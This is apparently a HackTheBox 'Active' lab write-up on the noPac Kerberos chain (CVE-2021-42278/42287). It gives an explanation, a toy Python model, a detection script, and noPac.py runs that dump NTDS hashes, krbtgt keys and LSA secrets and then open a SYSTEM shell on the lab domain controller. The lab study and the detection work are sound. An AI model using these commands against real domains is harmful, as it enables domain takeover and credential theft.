CVE-2021-42278/CVE-2021-42287
The target might be vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain attack, given how old the machine is: the SMB banner reports Windows 6.1 build 7601 (Server 2008 R2 SP1), well before the November 2021 patches that closed the chain.
Exploit (noPac)
The CVE-2021-42278 + CVE-2021-42287 chain (noPac) impersonates the domain controller by abusing computer-account naming. CVE-2021-42278: the DC did not enforce that a computer account's sAMAccountName keeps its trailing $ sign, so an attacker who controls a computer account can rename it to the DC's own name without the $ (here, dc). CVE-2021-42287: the attacker requests a TGT for that name, renames the account back, and then sends an S4U2self request with the TGT; the KDC cannot find an account called dc, retries the lookup with a trailing $ appended, finds the real dc$ machine account, and issues a service ticket for the DC as the impersonated user (Administrator).
By default, a standard domain user holds the SeMachineAccountPrivilege user right (Add workstations to domain) and ms-DS-MachineAccountQuota allows up to 10 computer accounts to be added, so the controlled computer account needed for the first step costs nothing more than a low-privileged domain credential.
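To make the two bugs concrete, the following is a toy model of the chain, added to this writeup and not code from the page or from the noPac tool. The directory, KDC and tickets are simplified stand-ins (no real Kerberos or LDAP), the quota and name checks mirror only the behaviours the chain depends on, and the account names, passwords and the "patched" switches are assumptions made for illustration. The patched variants model the two fixes in the simplest form: the directory refuses to strip the $ from a computer name, and the KDC stops falling back to a $-suffixed lookup.

```python
# Toy model of the noPac chain (CVE-2021-42278 + CVE-2021-42287).
# Added example for this writeup, not code from the page or from noPac: the
# directory, KDC and tickets are simplified stand-ins, and every name, password
# and "patched" flag below is an assumption made for illustration.
from dataclasses import dataclass


@dataclass
class Account:
    sam: str            # sAMAccountName as stored in the directory
    is_computer: bool
    password: str


@dataclass
class Ticket:
    kind: str           # "TGT" or "ST" (service ticket)
    client: str         # name the TGT was issued to, or the impersonated user of an ST
    service: str        # account the service ticket is encrypted for
    has_pac: bool


class Directory:
    """Tiny AD stand-in: accounts keyed by sAMAccountName plus a machine-account quota."""

    def __init__(self, quota=10, patched=False):
        self.accounts = {}
        self.quota = quota          # ms-DS-MachineAccountQuota (default 10)
        self.patched = patched      # CVE-2021-42278 fix: computer names must keep the trailing $
        self.joined_by = {}         # how many machines each user has added

    def add_computer(self, owner, sam, password):
        # SeMachineAccountPrivilege lets any authenticated user do this, up to the quota
        if self.joined_by.get(owner, 0) >= self.quota:
            raise PermissionError("ms-DS-MachineAccountQuota exhausted")
        if sam in self.accounts:
            raise ValueError("sAMAccountName already in use")
        self.accounts[sam] = Account(sam, True, password)
        self.joined_by[owner] = self.joined_by.get(owner, 0) + 1
        return self.accounts[sam]

    def rename(self, old, new):
        acct = self.accounts[old]
        if self.patched and acct.is_computer and not new.endswith("$"):
            raise PermissionError("computer sAMAccountName must end with $")
        if new in self.accounts:
            raise ValueError("sAMAccountName already in use")
        del self.accounts[old]
        acct.sam = new
        self.accounts[new] = acct


class KDC:
    """Models only the two KDC behaviours the chain depends on."""

    def __init__(self, directory, patched=False):
        self.dir = directory
        self.patched = patched      # CVE-2021-42287 fix (simplified): no silent '$' fallback

    def as_req(self, sam, password, request_pac=True):
        acct = self.dir.accounts.get(sam)
        if acct is None or acct.password != password:
            raise PermissionError("KDC_ERR_PREAUTH_FAILED")
        return Ticket("TGT", sam, "krbtgt", has_pac=request_pac)

    def s4u2self(self, tgt, impersonate):
        # The client name inside the TGT is looked up again, by name, at S4U2self time.
        acct = self.dir.accounts.get(tgt.client)
        if acct is None and not self.patched:
            # Vulnerable behaviour: retry with a trailing $, which resolves "dc" to the real dc$
            acct = self.dir.accounts.get(tgt.client + "$")
        if acct is None:
            raise PermissionError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        return Ticket("ST", impersonate, acct.sam, has_pac=True)


def nopac(directory, kdc, attacker, dc_sam="dc", fake="WIN-FAKE$", target_user="Administrator"):
    """Run the chain; returns the service ticket, or raises where a fix stops it."""
    pw = "attacker-chosen-pw"
    directory.add_computer(attacker, fake, pw)               # 1: join a machine account
    directory.rename(fake, dc_sam)                           # 2: drop the $, collide with the DC's name
    tgt = kdc.as_req(dc_sam, pw, request_pac=False)          # 3: TGT issued to "dc", without a PAC
    directory.rename(dc_sam, fake)                           # 4: restore the name so "dc" no longer exists
    return kdc.s4u2self(tgt, target_user)                    # 5: KDC resolves "dc" -> "dc$"


def run(patched):
    """Populate a directory with a DC and an admin, then attempt the chain as a plain user."""
    d = Directory(patched=patched)
    d.accounts["dc$"] = Account("dc$", True, "machine-secret")
    d.accounts["Administrator"] = Account("Administrator", False, "unknown-to-attacker")
    try:
        st = nopac(d, KDC(d, patched=patched), attacker="SVC_TGS")
        return f"{st.client} ticket for {st.service}"
    except PermissionError as e:
        return f"blocked: {e}"


if __name__ == "__main__":
    print(run(patched=False))   # Administrator ticket for dc$
    print(run(patched=True))    # blocked: computer sAMAccountName must end with $
```

The unpatched run ends with a ticket for dc$ in the name of Administrator, obtained with nothing but the right to add a machine account; either fix alone breaks the chain, which is why the real patch shipped both the naming check and the KDC-side hardening together.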
Testing
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ cme smb $IP -u SVC_TGS -p 'GPPstillStandingStrong2k18' -M nopac
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
NOPAC 10.10.10.100 445 DC TGT with PAC size 1401
NOPAC 10.10.10.100 445 DC TGT without PAC size 692
NOPAC 10.10.10.100 445 DC
NOPAC 10.10.10.100 445 DC VULNEABLE
NOPAC 10.10.10.100 445 DC next step: https://github.com/Ridter/noPac
The target system is confirmed to be vulnerable: the DC honoured a request for a TGT without a PAC (692 bytes versus 1401 with it), which is the pre-patch behaviour the module tests for.
Exploitation
The run below uses the Administrator credentials that were already recovered, so it only demonstrates the chain; the attack itself needs nothing more than a low-privileged domain user such as SVC_TGS (the account used for the check above), since adding the machine account relies on ms-DS-MachineAccountQuota rather than on admin rights.
┌──(kali㉿kali)-[~/…/htb/labs/active/noPac]
└─$ python3 noPac.py 'active.htb/administrator:Ticketmaster1968' -dc-ip $IP -use-ldap -dump
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.active.htb
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-W5HSATZXYED$"
[*] MachineAccount "WIN-W5HSATZXYED$" password = sGHqlOYRioCF
[*] Successfully added machine account WIN-W5HSATZXYED$ with password sGHqlOYRioCF.
[*] WIN-W5HSATZXYED$ object = CN=WIN-W5HSATZXYED,CN=Computers,DC=active,DC=htb
[*] WIN-W5HSATZXYED$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-W5HSATZXYED$
[*] Restored WIN-W5HSATZXYED$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc.active.htb.ccache
[*] Attempting to del a computer with the name: WIN-W5HSATZXYED$
[*] Delete computer WIN-W5HSATZXYED$ successfully!
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Target system bootKey: 0xff954ee81ffb63937b563f523caf1d59
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c15eb37006fb74c21a5d1e2144b726e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ACTIVE\DC$:plain_password_hex:a96872372de6af7462f8de5262d671df7f0dc875cd5f9fe2fd405cf042403daff44cd9948be48d00231e24655dad7e2bdcacf73c9f6e849c2c90ad4052738a78eb61684475c3b5d27304c8c48726ae5101e4d355b9e842fabee7e9dd4a2842b429d80ce1d2a4114c7160d25818d4acae3b14a1bf1ee381046b7a10c69a087dbd788b37bf8a35203870e415bbf94512b2a1ed998a65fb7768dd3320237420457c86d15f38d3c9052c418c7ce5294a1babed3b6f9032897118197d7caaa1472f00bbcc3af9f8da22934d504b88b8103f23201aa446e67cfd4178fd9c2ec4bafe22d92c347baa6edb180e10b763c0af2e2d
ACTIVE\DC$:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
[*] NL$KM
0000 CC 6F B8 46 C3 0C 58 05 2F F2 07 2E DA E6 BF 7D .o.F..X./......}
0010 60 63 F6 89 E7 0E D5 D5 22 EE 54 DA 63 12 5B B5 `c......".T.c.[.
0020 D8 DA 0B B7 82 0E 3D E1 9D 7A 03 15 08 5C B0 AE ......=..z...\..
0030 EF 63 91 B9 6C 87 65 A8 14 62 95 BC 77 69 77 08 .c..l.e..b..wiw.
NL$KM:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb7820e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\SVC_TGS:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
Administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
Administrator:des-cbc-md5:5891549b31f2c294
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\SVC_TGS:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\SVC_TGS:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\SVC_TGS:des-cbc-md5:d6c7eca70862f1d0
DC$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
DC$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
DC$:des-cbc-md5:980810f257a170c4
[*] Cleaning up...
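The output above shows exactly what the chain leaves in the DC's Security log: a computer account is created, renamed to dc (a name without the trailing $), renamed back, and deleted, all by one user within seconds. The following is an added detection example, not code from the page or from noPac: it correlates those steps over a handful of hand-written events. The events are constructed for this example in a flat key=value form rather than real EVTX/XML, and their timestamps and the helpdesk account are made up; the event IDs are the real ones (4741 computer account created, 4781 account name changed, 4743 computer account deleted), and in real 4781 events the old and new names are the OldTargetUserName and NewTargetUserName fields.

```python
# Detection for the account churn noPac leaves in the Security log.
# Added example for this writeup, not code from the page or from the noPac tool.
# SAMPLE_EVENTS is constructed by hand (flat key=value lines, not real EVTX);
# timestamps and the "helpdesk" subject are made up, the event IDs are real.
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
time=2024-01-01T10:00:00 id=4741 subject=SVC_TGS target=WIN-W5HSATZXYED$
time=2024-01-01T10:00:01 id=4781 subject=SVC_TGS old=WIN-W5HSATZXYED$ new=dc
time=2024-01-01T10:00:02 id=4781 subject=SVC_TGS old=dc new=WIN-W5HSATZXYED$
time=2024-01-01T10:00:05 id=4743 subject=SVC_TGS target=WIN-W5HSATZXYED$
time=2024-01-01T11:30:00 id=4781 subject=helpdesk old=PC-OLD$ new=PC-NEW$
"""


def parse_events(text):
    """Parse the constructed key=value lines into dicts with typed time and id."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        fields["time"] = datetime.fromisoformat(fields["time"])
        fields["id"] = int(fields["id"])
        events.append(fields)
    return events


def dropped_dollar(events):
    """4781 renames where a computer name (trailing $) becomes a non-computer name.

    This alone is the CVE-2021-42278 primitive and is worth an alert by itself;
    legitimate renames keep the $ (the helpdesk event above does not match).
    """
    return [e for e in events
            if e["id"] == 4781 and e["old"].endswith("$") and not e["new"].endswith("$")]


def nopac_sequences(events, dc_accounts=frozenset({"DC$"}), window=timedelta(minutes=10)):
    """Correlate create -> strip $ -> restore (-> delete) by the same subject within `window`.

    dc_accounts is the set of known DC machine accounts (assumed here; in practice
    read it from the Domain Controllers OU) and upgrades the severity when the
    stripped name collides with one of them.
    """
    alerts = []
    for strip in dropped_dollar(events):
        subj, fake, collided, t0 = strip["subject"], strip["old"], strip["new"], strip["time"]
        same_actor = [e for e in events
                      if e["subject"] == subj and abs(e["time"] - t0) <= window]
        created = any(e["id"] == 4741 and e["target"] == fake and e["time"] <= t0
                      for e in same_actor)
        restored = any(e["id"] == 4781 and e["old"] == collided and e["new"] == fake
                       and e["time"] >= t0 for e in same_actor)
        deleted = any(e["id"] == 4743 and e["target"] == fake and e["time"] >= t0
                      for e in same_actor)
        if collided.upper() + "$" in {a.upper() for a in dc_accounts}:
            severity = "critical"       # the name now matches a DC: this is the noPac shape
        elif restored:
            severity = "high"           # strip-then-restore has no legitimate use
        else:
            severity = "medium"
        alerts.append({"subject": subj, "fake_account": fake, "collided_name": collided,
                       "created": created, "restored": restored, "deleted": deleted,
                       "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in nopac_sequences(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The strip-then-restore pair is the signal to key on: a computer account that loses its $ and gets it back a second later has no administrative explanation, and when the interim name equals a DC's name the sequence is the attack, regardless of whether the account is deleted afterwards (noPac deletes it, a cruder operator may not).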
Domain Level Compromise
Shelldrop
┌──(kali㉿kali)-[~/…/htb/labs/active/noPac]
└─$ python3 noPac.py 'active.htb/administrator:Ticketmaster1968' -dc-ip $IP -use-ldap -shell
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.active.htb
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Already have user Administrator ticket for target dc.active.htb
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
C:\Windows\system32> ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::91dd:26f0:4484:75bc
   Link-local IPv6 Address . . . . . : fe80::91dd:26f0:4484:75bc%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

Tunnel adapter isatap.{73a3c9b3-56c9-47b6-9326-5c0ffb1a8451}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
GG